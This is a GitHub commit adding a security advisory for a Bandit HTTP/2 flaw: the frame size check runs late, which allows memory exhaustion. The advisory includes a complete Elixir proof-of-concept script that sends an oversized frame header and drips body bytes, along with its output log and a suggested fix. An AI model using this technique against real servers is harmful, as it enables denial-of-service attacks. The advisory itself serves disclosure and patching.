Skip to content

Commit 951026f

Browse files
advisory-database[bot]advisory-database[bot]
committed
1 parent 83d5ca0 commit 951026f

1 file changed

Lines changed: 73 additions & 0 deletions

File tree

advisories/github-reviewed/2026/05/GHSA-q6v9-r226-v65f/GHSA-q6v9-r226-v65f.json

Lines changed: 73 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,73 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-q6v9-r226-v65f",
4+
"modified": "2026-05-07T03:52:31Z",
5+
"published": "2026-05-07T03:52:31Z",
6+
"aliases": [
7+
"CVE-2026-42788"
8+
],
9+
"summary": "Bandit HTTP/2 Frame Size Limit Bypass via Late Buffer Check Enables Memory Exhaustion",
10+
"details": "### Summary\n\nBandit's HTTP/2 parser checks frame size *after* it has already buffered the full body, instead of when it sees the 9-byte header. A peer can announce a 16 MiB frame on a connection that agreed to 16 KiB frames and the server will silently buffer up to 1024× the agreed budget per connection. Across many connections this becomes a memory-pressure DoS. Severity: medium.\n\n### Details\n\nIn `lib/bandit/http2/frame.ex:23-65`, every clause that could detect an oversized frame requires `payload::binary-size(length)` to match — meaning the body has to be fully in memory before the size guard runs. Until then the parser returns `{:more, msg}` and the connection layer keeps reading. So the cap fires only after the violation is complete.\n\nThe frame type and stream id don't matter; the parser never gets that far.\n\n### PoC\n\nThe script is at the end. It:\n\n1. Opens an h2c connection to a Bandit server it starts itself.\n2. Sends a 9-byte frame header announcing `length = 0xFFFFFF` (~16 MiB).\n3. Polls for `GOAWAY(FRAME_SIZE_ERROR)`. If silent, drips body bytes in 64 KiB chunks.\n\nA patched server sends GOAWAY on the header alone. A vulnerable server stays silent and keeps accepting bytes.\n\n**Suggested fix**\n\nAdd a header-only clause that rejects on the length field alone, e.g. `def deserialize(<<length::24, _::binary>> = msg, max_frame_size) when length > max_frame_size, do: {{:error, frame_size_error(), \"...\"}, drop_frame_or_close(msg)}`, placed before the body-bearing clauses so the size check runs as soon as the 9-byte header is in hand rather than after the body has been buffered.\n\n### Impact\n\nAny Bandit server speaking HTTP/2 (h2 or h2c). No authentication or specific route needed — the bug is in the framing layer, before any Plug runs. An attacker holding a few thousand concurrent connections can pin tens of GiB of buffer memory, far beyond what the negotiated `max_frame_size` should allow. No code execution, no data disclosure — pure resource exhaustion.\n\nFix: add a header-only clause that rejects on `length > max_frame_size` as soon as the 9 header bytes arrive, before the body-bearing clauses.\n\n```elixir\n# Bandit HTTP/2 oversized-frame late-check PoC.\n#\n# RFC 9113 §6.5.2 sets the default SETTINGS_MAX_FRAME_SIZE to 16384.\n# Bandit's frame deserializer (lib/bandit/http2/frame.ex) checks this\n# limit *after* matching `payload::binary-size(length)` in the frame\n# pattern. When the announced length exceeds what the buffer holds,\n# none of the body-bearing clauses match and `deserialize/2` returns\n# `{:more, msg}`, telling the caller to keep buffering. The oversize\n# error in the \"valid shape, length > max_frame_size\" clause therefore\n# fires only *after* the entire announced body has been received —\n# letting a peer trickle up to ~16 MiB per frame (the 24-bit length\n# field maximum) into the server before the cap engages, well past\n# the 16 KiB the server agreed to.\n#\n# This PoC announces a frame with length = 0xFFFFFF (~16 MiB), drips\n# body bytes in 64 KiB chunks, and after each chunk does a brief\n# non-blocking recv to see if the server has reacted. A patched server\n# should send GOAWAY(FRAME_SIZE_ERROR) within the first chunk (header\n# alone is enough). A vulnerable server keeps silently accepting up\n# to the full 16 MiB.\n#\n# We use a SETTINGS frame (type=0x4, stream_id=0) for the abusive\n# header — the parser never reaches dispatch (it's stuck buffering\n# body), so the type and stream id are immaterial to the bug.\n#\n# Run: elixir scripts/bandit/http2_frame_size_late_check.exs\n\nMix.install([\n {:bandit, \"~> 1.10\"},\n {:plug, \"~> 1.19\"}\n])\n\ndefmodule NoopApp do\n @behaviour Plug\n def init(opts), do: opts\n def call(conn, _opts), do: Plug.Conn.send_resp(conn, 200, \"ok\\n\")\nend\n\ndefmodule FrameSizeLateCheck do\n @port 4321\n @connection_preface \"PRI * HTTP/2.0\\r\\n\\r\\nSM\\r\\n\\r\\n\"\n\n @type_settings 0x4\n @type_goaway 0x7\n @flag_settings_ack 0x1\n\n @max_24_bit 0xFFFFFF\n @drip_chunk_size 64 * 1024\n @max_total_drip 4 * 1024 * 1024\n\n def run do\n {:ok, _} = Bandit.start_link(plug: NoopApp, ip: {127, 0, 0, 1}, port: @port)\n\n {:ok, sock} =\n :gen_tcp.connect(~c\"127.0.0.1\", @port, [:binary, active: false, nodelay: true])\n\n advertised_max_frame_size = handshake!(sock)\n log(\"Handshake complete. Server advertised max_frame_size=#{advertised_max_frame_size}.\")\n\n abusive_header =\n frame_header(@max_24_bit, @type_settings, 0, 0)\n\n log(\n \"Sending oversized SETTINGS header: length=#{@max_24_bit} \" <>\n \"(#{div(@max_24_bit, 1024 * 1024)} MiB) vs cap #{advertised_max_frame_size}.\"\n )\n\n :ok = :gen_tcp.send(sock, abusive_header)\n\n case poll_for_reaction(sock, 200) do\n {:goaway, error_code} ->\n log(\"Server sent GOAWAY on header alone: error_code=#{error_code} — patched.\")\n finish(sock)\n\n :silent ->\n log(\"Server silent after header. Beginning body drip…\")\n drip_loop(sock, 0)\n end\n end\n\n defp drip_loop(sock, total_sent) when total_sent >= @max_total_drip do\n log(\n \"Drip cap reached: #{total_sent} bytes accepted with no server reaction. \" <>\n \"Server is buffering an oversized frame body well past max_frame_size.\"\n )\n\n finish(sock)\n end\n\n defp drip_loop(sock, total_sent) do\n chunk = :binary.copy(<<0>>, @drip_chunk_size)\n\n case :gen_tcp.send(sock, chunk) do\n :ok ->\n new_total = total_sent + @drip_chunk_size\n\n case poll_for_reaction(sock, 50) do\n {:goaway, error_code} ->\n log(\n \"After #{new_total} body bytes (#{div(new_total, 1024)} KiB) the server \" <>\n \"sent GOAWAY: error_code=#{error_code}.\"\n )\n\n finish(sock)\n\n :silent ->\n if rem(new_total, 512 * 1024) == 0 do\n log(\"Dripped #{div(new_total, 1024)} KiB so far, no reaction.\")\n end\n\n drip_loop(sock, new_total)\n end\n\n {:error, reason} ->\n log(\"Send failed at total=#{total_sent}: #{inspect(reason)}.\")\n finish(sock)\n end\n end\n\n defp poll_for_reaction(sock, timeout_ms) do\n case :gen_tcp.recv(sock, 9, timeout_ms) do\n {:ok, <<length::24, type::8, _flags::8, _r::1, _stream_id::31>>} ->\n case recv_payload(sock, length, timeout_ms) do\n {:ok, payload} when type == @type_goaway ->\n <<_last_id::32, error_code::32, _debug::binary>> = payload\n {:goaway, error_code}\n\n {:ok, _} ->\n :silent\n\n {:error, _} ->\n :silent\n end\n\n {:error, :timeout} ->\n :silent\n\n {:error, :closed} ->\n {:goaway, :connection_closed_without_goaway}\n end\n end\n\n defp finish(sock), do: :gen_tcp.close(sock)\n\n # --- HTTP/2 handshake helpers ------------------------------------------\n\n defp handshake!(sock) do\n :ok = :gen_tcp.send(sock, @connection_preface)\n :ok = :gen_tcp.send(sock, build_settings_frame(<<>>))\n\n {:ok, server_settings_frame} = recv_full_frame(sock, 5_000)\n @type_settings = server_settings_frame.type\n advertised_max_frame_size = parse_max_frame_size(server_settings_frame.payload)\n\n :ok = :gen_tcp.send(sock, build_settings_frame(<<>>, @flag_settings_ack))\n\n _ = drain(sock, 100)\n advertised_max_frame_size\n end\n\n # SETTINGS payload is a sequence of 6-byte (id::16, value::32) entries.\n # SETTINGS_MAX_FRAME_SIZE has id=0x5; default per RFC 9113 is 16384.\n defp parse_max_frame_size(payload), do: parse_max_frame_size(payload, 16384)\n defp parse_max_frame_size(<<>>, current_value), do: current_value\n\n defp parse_max_frame_size(<<0x5::16, value::32, rest::binary>>, _current) do\n parse_max_frame_size(rest, value)\n end\n\n defp parse_max_frame_size(<<_id::16, _value::32, rest::binary>>, current) do\n parse_max_frame_size(rest, current)\n end\n\n defp build_settings_frame(payload, flags \\\\ 0) do\n frame_header(byte_size(payload), @type_settings, flags, 0) <> payload\n end\n\n defp frame_header(length, type, flags, stream_id) do\n <<length::24, type::8, flags::8, 0::1, stream_id::31>>\n end\n\n defp recv_full_frame(sock, timeout_ms) do\n with {:ok, <<length::24, type::8, flags::8, _r::1, stream_id::31>>} <-\n :gen_tcp.recv(sock, 9, timeout_ms),\n {:ok, payload} <- recv_payload(sock, length, timeout_ms) do\n {:ok, %{length: length, type: type, flags: flags, stream_id: stream_id, payload: payload}}\n end\n end\n\n defp recv_payload(_sock, 0, _timeout_ms), do: {:ok, <<>>}\n defp recv_payload(sock, length, timeout_ms), do: :gen_tcp.recv(sock, length, timeout_ms)\n\n defp drain(sock, timeout_ms) do\n case :gen_tcp.recv(sock, 0, timeout_ms) do\n {:ok, bytes} -> bytes <> drain(sock, timeout_ms)\n {:error, _} -> <<>>\n end\n end\n\n defp log(message), do: IO.puts(\"[#{Time.utc_now() |> Time.truncate(:millisecond)}] #{message}\")\nend\n\nFrameSizeLateCheck.run()\n```\n\n```logs\n17:23:19.125 [info] Running NoopApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)\n[15:23:19.242] Handshake complete. Server advertised max_frame_size=16384.\n[15:23:19.243] Sending oversized SETTINGS header: length=16777215 (15 MiB) vs cap 16384.\n[15:23:19.444] Server silent after header. Beginning body drip…\n[15:23:19.857] Dripped 512 KiB so far, no reaction.\n[15:23:20.265] Dripped 1024 KiB so far, no reaction.\n[15:23:20.676] Dripped 1536 KiB so far, no reaction.\n[15:23:21.094] Dripped 2048 KiB so far, no reaction.\n[15:23:21.511] Dripped 2560 KiB so far, no reaction.\n[15:23:21.925] Dripped 3072 KiB so far, no reaction.\n[15:23:22.340] Dripped 3584 KiB so far, no reaction.\n[15:23:22.749] Dripped 4096 KiB so far, no reaction.\n[15:23:22.749] Drip cap reached: 4194304 bytes accepted with no server reaction. Server is buffering an oversized frame body well past max_frame_size.\n```",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Hex",
21+
"name": "bandit"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0.3.5"
29+
},
30+
{
31+
"fixed": "1.11.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-q6v9-r226-v65f"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42788"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/mtrudel/bandit/commit/1e8e55966da9129016b73d32f0e1df4630e3b463"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://cna.erlef.org/cves/CVE-2026-42788.html"
54+
},
55+
{
56+
"type": "PACKAGE",
57+
"url": "https://github.com/mtrudel/bandit"
58+
},
59+
{
60+
"type": "WEB",
61+
"url": "https://osv.dev/vulnerability/EEF-CVE-2026-42788"
62+
}
63+
],
64+
"database_specific": {
65+
"cwe_ids": [
66+
"CWE-770"
67+
],
68+
"severity": "MODERATE",
69+
"github_reviewed": true,
70+
"github_reviewed_at": "2026-05-07T03:52:31Z",
71+
"nvd_published_at": "2026-05-01T21:16:17Z"
72+
}
73+
}

0 commit comments

Comments
 (0)